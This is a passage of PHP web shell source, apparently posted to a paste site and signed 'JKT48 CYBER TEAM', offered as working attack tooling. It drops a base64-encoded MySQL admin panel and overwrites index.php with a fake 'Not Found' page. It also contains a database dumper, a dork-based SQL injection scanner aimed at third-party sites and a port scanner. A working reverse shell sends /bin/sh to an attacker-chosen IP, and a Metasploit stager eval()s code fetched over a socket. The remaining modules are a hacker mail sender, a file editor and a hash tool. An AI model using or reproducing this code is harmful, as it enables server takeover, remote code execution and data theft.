3Rpb24gPT0gImR1bXBEQiIgKSB7DQoJd2hpbGUoIGxpc3QoJHZhciwgJHZhbHVlKSA9IGVhY2goJEhUVFBfQ09PS0lFX1ZBUlMpICkgew0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApICRVU0VSTkFNRSA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKSAkUEFTU1dPUkQgPSAkdmFsdWU7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICkgJEhPU1ROQU1FID0gJHZhbHVlOw0KCX0NCgkkbXlzcWxIYW5kbGUgPSBAbXlzcWxfY29ubmVjdCggJEhPU1ROQU1FLiI6MzMwNiIsICRVU0VSTkFNRSwgJFBBU1NXT1JEICk7DQoJZHVtcCgpOw0KfSBlbHNlIHsNCgl3aGlsZSggbGlzdCgkdmFyLCAkdmFsdWUpID0gZWFjaCgkSFRUUF9DT09LSUVfVkFSUykgKSB7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5fdXNlcm5hbWUiICkgJFVTRVJOQU1FID0gJHZhbHVlOw0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3Bhc3N3b3JkIiApICRQQVNTV09SRCA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIgKSAkSE9TVE5BTUUgPSAkdmFsdWU7DQoJfQ0KCWVjaG8gIjwhLS0iOw0KCSRteXNxbEhhbmRsZSA9IEBteXNxbF9jb25uZWN0KCAkSE9TVE5BTUUuIjozMzA2IiwgJFVTRVJOQU1FLCAkUEFTU1dPUkQgKTsNCgllY2hvICItLT4iOw0KCWlmKCAkbXlzcWxIYW5kbGUgPT0gZmFsc2UgKSB7DQoJCWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0cj48dGQ+PGNlbnRlcj5cbiI7DQoJCWVjaG8gIjxoMT5Xcm9uZyBQYXNzd29yZCE8L2gxPlxuIjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1sb2dvbic+TG9nb248L2E+XG4iOw0KCQllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJfSBlbHNlIHsNCgkJaWYoICRhY3Rpb24gPT0gImJHbHpkRVJDY3c9PSIgKQ0KCQkJbGlzdERhdGFiYXNlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVEQiIgKQ0KCQkJY3JlYXRlRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcERCIiApDQoJCQlkcm9wRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAibGlzdFRhYmxlcyIgKQ0KCQkJbGlzdFRhYmxlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVUYWJsZSIgKQ0KCQkJY3JlYXRlVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcFRhYmxlIiApDQoJCQlkcm9wVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAidmlld1NjaGVtYSIgKQ0KCQkJdmlld1NjaGVtYSgpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJxdWVyeSIgKQ0KCQkJdmlld0RhdGEoICRxdWVyeVN0ciApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJhZGRGaWVsZCIgKQ0KCQkJbWFuYWdlRmllbGQoICJhZGQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImFkZEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RmllbGQiICkNCgkJCW1hbmFnZUZpZWxkKCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZWRpdEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcEZpZWxkIiApDQoJCQlkcm9wRmllbGQoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IiApDQoJCQl2aWV3RGF0YSggIiIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImFkZCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YV9zdWJtaXQiICkNCgkJCW1hbmFnZURhdGFfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImVkaXQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImVkaXREYXRhX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRGF0YV9zdWJtaXQoICJlZGl0IiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJkZWxldGVEYXRhIiApDQoJCQlkZWxldGVEYXRhKCk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gInV0aWxzIiApDQoJCQl1dGlscygpOw0KCQlteXNxbF9jbG9zZSggJG15c3FsSGFuZGxlKTsNCgkJZm9vdGVyX2h0bWwoKTsNCgl9DQp9DQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5NeVNRTCBJbnRlcmZhY2UgKERldmVsb3BlZCBCeSBNb2hhamVyMjIpPC90aXRsZT4NCjxib2R5IGJnQ29sb3I9IzAwMDAwMCA+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KcC5sb2NhdGlvbiB7DQoJY29sb3I6ICMwMEZGMDA7DQp9DQpoMSwgaDIsIGgzIHsNCgljb2xvcjogIzAwRkYwMDsNCn0NCnRoIHsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyOw0KCWNvbG9yOiAjMDBGRjAwOw0KCWZvbnQtc2l6ZTogc21hbGw7DQp9DQp0ZCB7DQoJY29sb3I6ICMwMEZGMDA7DQoJYmFja2dyb3VuZC1jb2xvcjogIzQ0NDQ0NDsNCglmb250LXNpemU6IHNtYWxsOw0KfQ0KZm9ybSB7DQoJbWFyZ2luLXRvcDogMDsNCgltYXJnaW4tYm90dG9tOiAwOw0KfQ0KYSB7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJY29sb3I6ICMwMEZGMDA7DQoJZm9udC1zaXplOnNtYWxsOw0KfQ0KQTpsaW5rIHsNCkNPTE9SOiNGRkZGRkY7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCmNvbG9yOiMwMEZGMDA7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCmlucHV0LCBzZWxlY3QsIHRleHRhcmVhIHsNCmJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQpib3JkZXItc3R5bGU6IHNvbGlkOw0KZm9udC1mYW1pbHk6IFRhaG9tYSxWZXJkYW5hLEFyaWFsLFNhbnMtU2VyaWY7DQpmb250LXNpemU6c21hbGw7DQpjb2xvcjogIzAwRkYwMDsNCnBhZGRpbmc6IDBweDsNCn0NCmxpIHsNCmNvbG9yOiAjMDBGRjAwOw0KfQ0KLm5ldyB7DQpjb2xvcjogIzAwRkYwMDsNCn0NCi8vLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg==';
  766. $file = fopen("db-sql.php" ,"w+");
  767. $write = fwrite ($file ,base64_decode($sqlshell));
  768. fclose($file);
  769.     chmod("db-sql.php", 0644);
  770. $indexshell = fopen("index.php" ,"w+");
  771. $data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+';
  772. $tulis = fwrite( $indexshell, base64_decode($data));
  773. fclose($indexshell);
  774.    echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>";
  775. }
  776. //////////////////////////////////////////////
  777. elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
  778.     {
  779.     ?>
  780.     <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
  781.     <?php
  782. echo $head.'<p align="center">';
  783. echo '
  784. <table width=371 class=tabnet >
  785. <tr><th colspan="2">Database Dump</th></tr>
  786. <tr>
  787.         <td>Server </td>
  788.         <td><input class="inputz" type=text name=server size=52></td></tr><tr>
  789.         <td>Username</td>
  790.         <td><input class="inputz" type=text name=username size=52></td></tr><tr>
  791.         <td>Password</td>
  792.         <td><input class="inputz" type=text name=password size=52></td></tr><tr>
  793.         <td>DataBase Name</td>
  794.         <td><input class="inputz" type=text name=dbname size=52></td></tr>
  795.         <tr>
  796.         <td>DB Type </td>
  797.         <td><form method=post action="'.$me.'">
  798.         <select class="inputz" name=method>
  799.                 <option  value="gzip">Gzip</option>
  800.                 <option value="sql">Sql</option>
  801.                 </select>
  802.         <input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
  803.         </form></center></table>';
  804. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  805. $date = date("Y-m-d");
  806. $dbserver = $_POST['server'];
  807. $dbuser = $_POST['username'];
  808. $dbpass = $_POST['password'];
  809. $dbname = $_POST['dbname'];
  810. $file = "Dump-$dbname-$date";
  811. $method = $_POST['method'];
  812. if ($method=='sql'){
  813. $file="Dump-$dbname-$date.sql";
  814. $fp=fopen($file,"w");
  815. }else{
  816. $file="Dump-$dbname-$date.sql.gz";
  817. $fp = gzopen($file,"w");
  818. }
  819. function write($data) {
  820. global $fp;
  821. if ($_POST['method']=='ssql'){
  822. fwrite($fp,$data);
  823. }else{
  824. gzwrite($fp, $data);
  825. }}
  826. mysql_connect ($dbserver, $dbuser, $dbpass);
  827. mysql_select_db($dbname);
  828. $tables = mysql_query ("SHOW TABLES");
  829. while ($i = mysql_fetch_array($tables)) {
  830.     $i = $i['Tables_in_'.$dbname];
  831.     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  832.     write($create['Create Table'].";\n\n");
  833.     $sql = mysql_query ("SELECT * FROM ".$i);
  834.     if (mysql_num_rows($sql)) {
  835.         while ($row = mysql_fetch_row($sql)) {
  836.             foreach ($row as $j => $k) {
  837.                 $row[$j] = "'".mysql_escape_string($k)."'";
  838.             }
  839.             write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  840.         }
  841.     }
  842. }
  843. if ($method=='ssql'){
  844. fclose ($fp);
  845. }else{
  846. gzclose($fp);}
  847. header("Content-Disposition: attachment; filename=" . $file);  
  848. header("Content-Type: application/download");
  849. header("Content-Length: " . filesize($file));
  850. flush();
  851.  
  852. $fp = fopen($file, "r");
  853. while (!feof($fp))
  854. {
  855.     echo fread($fp, 65536);
  856.     flush();
  857. }
  858. fclose($fp);
  859. }
  860.  
  861. }
  862. //////////////////////////////////////////////////
  863. elseif(isset($_GET['x']) && ($_GET['x'] == 'sqli-scanner'))
  864. {      
  865. ?>
  866. <form action="?y=<?php echo $pwd; ?>&amp;x=sqli-scanner" method="post">
  867.  
  868. <?php
  869.  
  870. echo '<br><br><center><form method="post" action=""><b><font color="green">Dork : </font></b> &nbsp;&nbsp;<input class="inputz" type="text" value="" name="dork" style="color:#00ff00;background-color:#000000" size="20"/><input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan"></form></center>';
  871.  
  872. ob_start();
  873. set_time_limit(0);
  874.  
  875. if (isset($_POST['scan'])) {
  876.  
  877. $browser = $_SERVER['HTTP_USER_AGENT'];
  878.  
  879. $first = "startgoogle.startpagina.nl/index.php?q=";
  880. $sec = "&start=";
  881. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
  882.  
  883. for($id=0 ; $id<=30; $id++){
  884. $page=$id*10;
  885. $dork=urlencode($_POST['dork']);
  886. $url = $first.$dork.$sec.$page;
  887.  
  888. $curl = curl_init($url);
  889. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  890. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  891. $result = curl_exec($curl);
  892. curl_close($curl);
  893.  
  894. preg_match_all($reg,$result,$matches);
  895. }
  896. foreach($matches[1] as $site){
  897.  
  898. $url = preg_replace("/=/", "='", $site);
  899. $curl=curl_init();
  900. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  901. curl_setopt($curl,CURLOPT_URL,$url);
  902. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  903. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
  904. $GET=curl_exec($curl);
  905. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT *
  906.  
  907. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
  908. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font color=#FF0000> &#60;-- SQLI Vuln
  909.  
  910. Found..</font></b></center>';
  911. ob_flush();flush();
  912. }else{
  913. echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16"> &#60;-- Not Vuln</font></center>';
  914. ob_flush();flush();
  915. }
  916. ob_flush();flush();
  917. }
  918. ob_flush();flush();
  919. }
  920. ob_flush();flush();
  921. }
  922. ////////////////////////////////////////
  923.  
  924. elseif(isset($_GET['x']) && ($_GET['x'] == 'port-sc'))
  925.     {
  926.     ?>
  927.     <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">
  928.     <?php
  929.     echo '<br><br><center><br><b>+--=[ Port Scanner ]=--+</b><br>';
  930.     $start = strip_tags($_POST['start']);
  931.     $end = strip_tags($_POST['end']);
  932.     $host = strip_tags($_POST['host']);
  933.     if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  934.     for($i = $start; $i<=$end; $i++){
  935.     $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  936.     if($fp){
  937.     echo 'Port '.$i.' is <font color=green>open</font><br>';
  938.     }
  939.     flush();
  940.     }
  941.     }else{
  942.     echo '<table class=tabnet style="width:300px;padding:0 1px;">
  943.    <input type="hidden" name="y" value="phptools">
  944.    <tr><th colspan="5">Port Scanner</th></center></tr>
  945.    <tr>
  946.                 <td>Host</td>
  947.                 <td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>
  948.    </tr>
  949.    <tr>
  950.                 <td>Port start</td>
  951.                 <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>
  952.    </tr>
  953.         <tr><td>Port end</td>
  954.                 <td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="end" value="5000"/></td>
  955.    </tr><td><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />
  956.    </td></form></center></table>';
  957.     }
  958. }
  959. ///////////////////////////////////////////////////////
  960. elseif(isset($_GET['x']) && ($_GET['x'] == 'tool'))
  961. {      
  962. ?>
  963. <form action="?y=<?php echo $pwd; ?>&amp;x=tool" method="post">
  964. <?php
  965.  
  966. error_reporting(0);
  967. function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
  968. $s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&amp;x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />";
  969. echo $s_result;
  970. if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = ';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
  971. if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
  972. if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
  973. if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
  974. if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;}
  975. umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
  976. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  977. $process = proc_open($shell, $descriptorspec, $pipes);
  978. if(!is_resource($process)) exit(1);
  979. stream_set_blocking($pipes[0], 0);
  980. stream_set_blocking($pipes[1], 0);
  981. stream_set_blocking($pipes[2], 0);
  982. stream_set_blocking($sock, 0);
  983. while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  984. if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);}
  985. if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);}
  986. if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}
  987. }
  988. ////////////////////////////////////////////////////////
  989. elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){
  990. if(isset($_POST['mail_send'])){
  991.         $mail_to = $_POST['mail_to'];
  992.         $mail_from = $_POST['mail_from'];
  993.         $mail_subject = $_POST['mail_subject'];
  994.         $mail_content = magicboom($_POST['mail_content']);
  995.         if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){
  996.                 $msg = "email sent to $mail_to";
  997.         }
  998.         else $msg = "send email failed";
  999. }
  1000. ?>
  1001. <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  1002. <table class="cmdbox">
  1003. <tr><td>
  1004. <textarea class="output" name="mail_content" id="cmd" style="height:340px;">You got hacked by JKT48 CYBER TEAM</textarea>
  1005. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to</td></tr>
  1006. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="jkt48hacker@ymail.com" name="mail_from" />&nbsp; from</td></tr>
  1007. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="Please Patch Your Security" name="mail_subject" />&nbsp; subject</td></tr>
  1008. <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
  1009. <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>
  1010. </table>
  1011. </form>
  1012. <?php }
  1013.  
  1014. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
  1015.         @ob_start();
  1016.         @eval("phpinfo();");
  1017.         $buff = @ob_get_contents();
  1018.         @ob_end_clean();       
  1019.         $awal = strpos($buff,"<body>")+6;
  1020.         $akhir = strpos($buff,"</body>");
  1021.         echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  1022. }
  1023. elseif(isset($_GET['view']) && ($_GET['view'] != "")){
  1024.   if(is_file($_GET['view'])){
  1025.         if(!isset($file)) $file = magicboom($_GET['view']);
  1026.         if(!$win && $posix){
  1027.                 $name=@posix_getpwuid(@fileowner($folder));
  1028.                 $group=@posix_getgrgid(@filegroup($folder));
  1029.                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  1030.         }
  1031.         else {
  1032.                 $owner = $user;
  1033.         }
  1034.         $filn = basename($file);
  1035.         echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  1036.         <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
  1037.         <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  1038.                 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  1039.                 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  1040.                 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  1041.                 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  1042.         </form>
  1043.         </td></tr>
  1044.         <tr><td>Size</td><td>".ukuran($file)."</td></tr>
  1045.         <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
  1046.         <tr><td>Owner</td><td>".$owner."</td></tr>
  1047.         <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
  1048.         <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
  1049.         <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
  1050.         <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr>
  1051.         <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr>
  1052.         </table>
  1053.         ";
  1054.         if(isset($_GET['type']) && ($_GET['type']=='image')){
  1055.                 echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>";
  1056.         }
  1057.         elseif(isset($_GET['type']) && ($_GET['type']=='code')){
  1058.                 echo "<div class=\"viewfile\">";
  1059.                 $file = wordwrap(@file_get_contents($file),"240","\n");
  1060.                 @highlight_string($file);
  1061.                 echo "</div>";
  1062.         }
  1063.         else {
  1064.                 echo "<div class=\"viewfile\">";
  1065.                 echo nl2br(htmlentities((@file_get_contents($file))));
  1066.                 echo "</div>";
  1067.         }
  1068.   }
  1069.   elseif(is_dir($_GET['view'])){
  1070.                 echo showdir($pwd,$prompt);
  1071.   }
  1072.        
  1073. }
  1074. elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){
  1075.  
  1076.                 if(isset($_POST['save'])){
  1077.                         $file = $_POST['saveas'];
  1078.                         $content = magicboom($_POST['content']);
  1079.                         if($filez = @fopen($file,"w")){
  1080.                                 $time = date("d-M-Y H:i",time());
  1081.                                 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  1082.                                 else $msg = "failed to save";
  1083.                                 @fclose($filez);
  1084.                         }
  1085.                         else $msg = "permission denied";
  1086.                 }
  1087.                 if(!isset($file)) $file = $_GET['edit'];
  1088.                 if($filez = @fopen($file,"r")){
  1089.                         $content = "";
  1090.                         while(!feof($filez)){
  1091.                                 $content .= htmlentities(str_replace("'","'",fgets($filez)));
  1092.                         }
  1093.                         @fclose($filez);
  1094.                 }
  1095.        
  1096. ?>
  1097. <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  1098. <table class="cmdbox">
  1099. <tr><td colspan="2">
  1100. <textarea class="output" name="content">
  1101. <?php echo $content; ?>
  1102. </textarea>
  1103. <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
  1104. &nbsp;<?php echo $msg; ?></td></tr>
  1105. </table>
  1106. </form>
  1107. <?php
  1108. }
  1109. elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
  1110. {      
  1111. ?>
  1112. <form action="?y=<?php echo $pwd; ?>&amp;x=logout" method="post">
  1113.  
  1114. <?php
  1115.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1116.     echo 'bye!';
  1117. }
  1118.  
  1119. /////////////////////////////////////////////////////////////////
  1120. elseif(isset($_GET['x']) && ($_GET['x'] == 'hash'))
  1121.     {
  1122. $submit= $_POST['enter'];
  1123. if (isset($submit)) {
  1124. $pass = $_POST['password']; // password
  1125. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  1126. $hash = md5($pass); // md5 hash #1
  1127. $md4 = hash("md4",$pass);
  1128. $hash_md5 = md5($salt.$pass); // md5 hash with salt #2
  1129. $hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
  1130. $hash1 = sha1($pass); // sha1 hash #4
  1131. $sha256 = hash("sha256",$text);
  1132. $hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
  1133. $hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
  1134. }
  1135. echo '<br><br><center><h1>Password Hash</h1></center><br><br><div class=content>';
  1136. echo '<form action="" method="post"><b><table class=tabnet>';
  1137. echo '<tr><th colspan="2">Password Hash</th></center></tr>';
  1138. echo '<tr><td><b>masukan kata yang ingin di encrypt:</b></td>';
  1139. echo '<td><input class="inputz" type="text" name="password" size="40" />';
  1140. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
  1141. echo '</td></tr><br>';
  1142. echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
  1143. echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
  1144. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
  1145. echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
  1146. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
  1147. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
  1148. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
  1149. echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
